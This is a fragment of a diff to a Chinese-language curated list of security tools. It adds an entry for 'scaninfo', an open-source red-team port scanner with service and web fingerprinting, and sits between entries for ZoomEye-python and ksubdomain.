---------------------------------------- ----------------------------------------
@ -73,6 +74,16 @@ Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在
ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据 ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据
### [scaninfo](detail/scaninfo.md)
![Author](https://img.shields.io/badge/Author-华东360安服团队-orange)
![Language](https://img.shields.io/badge/Language-Golang-blue)
![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.1.0-red)
<https://github.com/redtoolskobe/scaninfo>
scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。
### [ksubdomain](detail/ksubdomain.md) ### [ksubdomain](detail/ksubdomain.md)
![Author](https://img.shields.io/badge/Author-w8ay-orange) ![Author](https://img.shields.io/badge/Author-w8ay-orange)
![Language](https://img.shields.io/badge/Language-Golang-blue) ![Language](https://img.shields.io/badge/Language-Golang-blue)

Loading…
Cancel
Save